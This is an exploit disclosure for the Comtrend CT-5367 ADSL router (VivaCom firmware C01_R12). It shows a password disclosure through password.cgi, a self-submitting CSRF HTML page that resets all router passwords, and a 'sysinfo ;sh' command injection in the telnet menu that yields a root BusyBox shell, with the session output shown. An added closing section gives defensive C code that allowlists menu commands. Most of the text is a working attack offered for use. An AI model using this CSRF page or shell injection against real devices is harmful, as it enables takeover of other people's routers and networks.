- /*COMTREND ADSL Router BTC(VivaCom) CT-5367 C01_R12 Remote Root
- =============================================================================
- Board ID : 96338A-122
- Software : A111-312BTC-C01_R12
- Bootloader : 1.0.37-12.1-1
- Wireless Driver : 4.170.16.0.cpe2.1sd
- ADSL : A2pB023k.d20k_rc2
- =============================================================================
- Type : HardWare
- Risk of use : High
- Type to use : Remote
- Discovered by : Todor Donev
- Author Email : todor.donev@gmail.com
- =============================================================================
- Special greetz to my sweetheart friend and my lil' secret Tsvetelina Emirska,
- and all my other friends that support me a lot of times for everything !!
- */
- root@linux:~# get.pl http://192.168.1.1/
- /*HTTP/1.1 401 Unauthorized
- Cache-Control: no-cache
- Connection: close
- Date: Sat, 01 Jan 2000 00:04:31 GMT
- Server: micro_httpd ## Yeah !! Bite me :(
- WWW-Authenticate: Basic realm="DSL Router"
- Content-Type: text/html
- <HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>
- <BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>
- Authorization required.
- <HR>
- <ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS>
- </BODY></HTML>
- */
- root@linux:~# get.pl http://192.168.1.1/password.cgi ## Information Disclosure
- /*HTTP/1.1 200 Ok
- Cache-Control: no-cache
- Connection: close
- Date: Mon, 03 Jan 2000 23:01:25 GMT
- Server: micro_httpd
- Content-Type: text/html
- <html>
- <head>
- <meta HTTP-EQUIV='Pragma' CONTENT='no-cache'>
- <link rel="stylesheet" href='stylemain.css' type='text/css'>
- <link rel="stylesheet" href='colors.css' type='text/css'>
- <script language="javascript" src="util.js"></script>
- <script language="javascript">
- <!-- hide -->\n ## Dammit! =))
- pwdAdmin = '<CENSORED>'; ## Censored Password
- pwdSupport = '<CENSORED>'; ## Censored Password
- pwdUser = '<CENSORED>';\n ## Censored Password
- */
- [CUT EXPLOIT HERE] ## CSRF For Change All passwords
- <html>
- <head></head>
- <title>COMTREND ADSL Router BTC(VivaCom) CT-5367 C01_R12 Change All passwords</title>
- <body onLoad=javascript:document.form.submit()>
- <form action="http://192.168.1.1/password.cgi"; method="POST" name="form">
- <input type="hidden" name="sptPassword" value="shpek">
- <input type="hidden" name="usrPassword" value="shpek">
- <input type="hidden" name="sysPassword" value="shpek">
- </form>
- </body>
- </html>
- [CUT EXPLOIT HERE]
- root@linux:~# telnet 192.168.1.1
- ADSL Router Model CT-5367 Sw.Ver. C01_R12
- Login: root
- Password:
- ## BINGOO !! Godlike =))
- > ?
- ?
- help
- logout
- reboot
- adsl
- atm
- ddns
- dumpcfg
- ping
- siproxd
- sntp
- sysinfo
- tftp
- wlan
- version
- build
- ipfilter
- > sysinfo
- Number of processes: 30
- 11:46pm up 2 days, 23:46,
- load average: 1 min:0.12, 5 min:0.05, 15 min:0.09
- total used free shared buffers
- Mem: 14012 13028 984 0 588
- Swap: 0 0 0
- Total: 14012 13028 984
- > sysinfo ;sh ## JAILBREAK !! FirmWare sucks :)
- Number of processes: 30
- 11:47pm up 2 days, 23:47,
- load average: 1 min:0.07, 5 min:0.05, 15 min:0.08
- total used free shared buffers
- Mem: 14012 13024 988 0 588
- Swap: 0 0 0
- Total: 14012 13024 988
- BusyBox v1.00 (2009.12.08-09:42+0000) Built-in shell (msh)
- Enter 'help' for a list of built-in commands.
- # cat /proc/version
- Linux version 2.6.8.1 (wander@localhost.localdomain) (gcc version 3.4.2) #1 Tue Dec 8 17:40:39 CST 2009
- # ps
- PID Uid VmSize Stat Command
- 1 root 280 S init
- 2 root SWN [ksoftirqd/0]
- 3 root SW< [events/0]
- 4 root SW< [khelper]
- 5 root SW< [kblockd/0]
- 15 root SW [pdflush]
- 16 root SW [pdflush]
- 17 root SW [kswapd0]
- 18 root SW< [aio/0]
- 23 root SW [mtdblockd]
- 32 root 328 S -sh
- 65 root 1384 S cfm
- 72 root SW [bcmsw]
- 192 root 216 S pvc2684d
- 275 root 496 S nas -P /var/wl0nas.lan0.pid -H 34954 -l br0 -i wl0 -A
- 342 root 304 S dhcpd
- 596 root 1384 S CT_Polling
- 600 root 432 S pppd -c 0.0.35.1 -i nas_0_0_35 -u <CENSORED> -p
- 931 root 248 S dhcpc -i nas_0_0_40
- 993 root 316 S dproxy -D btc-adsl
- 997 root 352 S upnp -L br0 -W ppp_0_0_35_1 -D
- 1013 root 512 S siproxd --config /var/siproxd/siproxd.conf
- 1014 root 512 S siproxd --config /var/siproxd/siproxd.conf
- 1015 root 512 S siproxd --config /var/siproxd/siproxd.conf
- 10745 root 292 S syslogd -C -l 7
- 10747 root 256 S klogd
- 6616 root 1396 S telnetd
- 6618 root 1428 S telnetd
- 6673 root 284 S sh -c sysinfo ;sh
- 6724 root 284 R ps
- # top
- Mem: 13164K used, 848K free, 0K shrd, 588K buff, 5920K cached
- Load average: 0.00, 0.02, 0.07 (State: S=sleeping R=running, W=waiting)
- PID USER STATUS RSS PPID %CPU %MEM COMMAND
- 6751 root R 288 6675 0.7 2.0 exe
- 2 root SWN 0 1 0.3 0.0 ksoftirqd/0
- 6616 root S 1396 65 0.1 9.9 telnetd
- 931 root S 248 1 0.1 1.7 dhcpc
- 6618 root S 1428 6616 0.0 10.1 telnetd
- 65 root S 1384 32 0.0 9.8 cfm
- 596 root S 1384 65 0.0 9.8 CT_Polling
- 1013 root S 512 1 0.0 3.6 siproxd
- 1014 root S 512 1013 0.0 3.6 siproxd
- 1015 root S 512 1014 0.0 3.6 siproxd
- 275 root S 496 1 0.0 3.5 nas
- 600 root S 432 1 0.0 3.0 pppd
- 997 root S 352 1 0.0 2.5 upnp
- 32 root S 328 1 0.0 2.3 sh
- 993 root S 316 1 0.0 2.2 dproxy
- 6675 root S 316 6673 0.0 2.2 exe
- 342 root S 304 1 0.0 2.1 dhcpd
- 10745 root S 292 1 0.0 2.0 exe
- 6673 root S 284 6618 0.0 2.0 sh
- 1 root S 280 0 0.0 1.9 init
- # echo * ## ls o.O?!?
- bin dev etc lib linuxrc mnt proc sbin usr var webs
- #
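
Added example, not part of the original paste and not Comtrend's firmware code: the process list above shows the menu command running as `sh -c sysinfo ;sh`, so the typed line reaches a shell unmodified. The C below shows the hardened pattern for such a menu: reject shell metacharacters, allowlist the verb against the "?" listing, and hand an argv[] to execv() instead of a shell. The names cli_parse, MENU and MAX_ARGS are hypothetical, and the set of permitted characters is an assumption.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Menu verbs copied from the "?" listing in the paste. */
static const char *const MENU[] = {
    "help", "logout", "reboot", "adsl", "atm", "ddns", "dumpcfg", "ping",
    "siproxd", "sntp", "sysinfo", "tftp", "wlan", "version", "build", "ipfilter",
};

#define MAX_ARGS 8

/* The observed behaviour is consistent with system(line), which runs
 * "sh -c <line>" and lets ';' start a second command.
 * cli_parse() instead splits `line` in place into argv[] with no shell involved.
 * Returns argc (>= 1) if the line is accepted, -1 if it is rejected. */
int cli_parse(char *line, char *argv[MAX_ARGS + 1])
{
    int argc = 0;

    /* Conservative character allowlist (assumed): letters, digits, space and
     * . : _ - only, so ; | & ` $ ( ) < > quotes and newlines never get through. */
    for (const char *p = line; *p; p++)
        if (!isalnum((unsigned char)*p) && !strchr(" .:_-", *p))
            return -1;

    for (char *tok = strtok(line, " "); tok; tok = strtok(NULL, " ")) {
        if (argc == MAX_ARGS)
            return -1;              /* too many arguments */
        argv[argc++] = tok;
    }
    argv[argc] = NULL;
    if (argc == 0)
        return -1;                  /* empty line */

    /* The verb must be one of the menu commands; "sh" is not on the list. */
    for (size_t i = 0; i < sizeof MENU / sizeof MENU[0]; i++)
        if (strcmp(argv[0], MENU[i]) == 0)
            return argc;            /* caller passes argv to execv(), never sh -c */
    return -1;
}

int main(void)
{
    char ok[] = "sysinfo", bad[] = "sysinfo ;sh", args[] = "ping 192.168.1.1";
    char *argv[MAX_ARGS + 1];
    printf("%d\n", cli_parse(ok, argv));    /* accepted */
    printf("%d\n", cli_parse(bad, argv));   /* rejected: ';' */
    printf("%d\n", cli_parse(args, argv));  /* accepted with one argument */
    return 0;
}
```

Each accepted verb still needs its own argument validation (for example, arguments that begin with '-' being read as options by the called program).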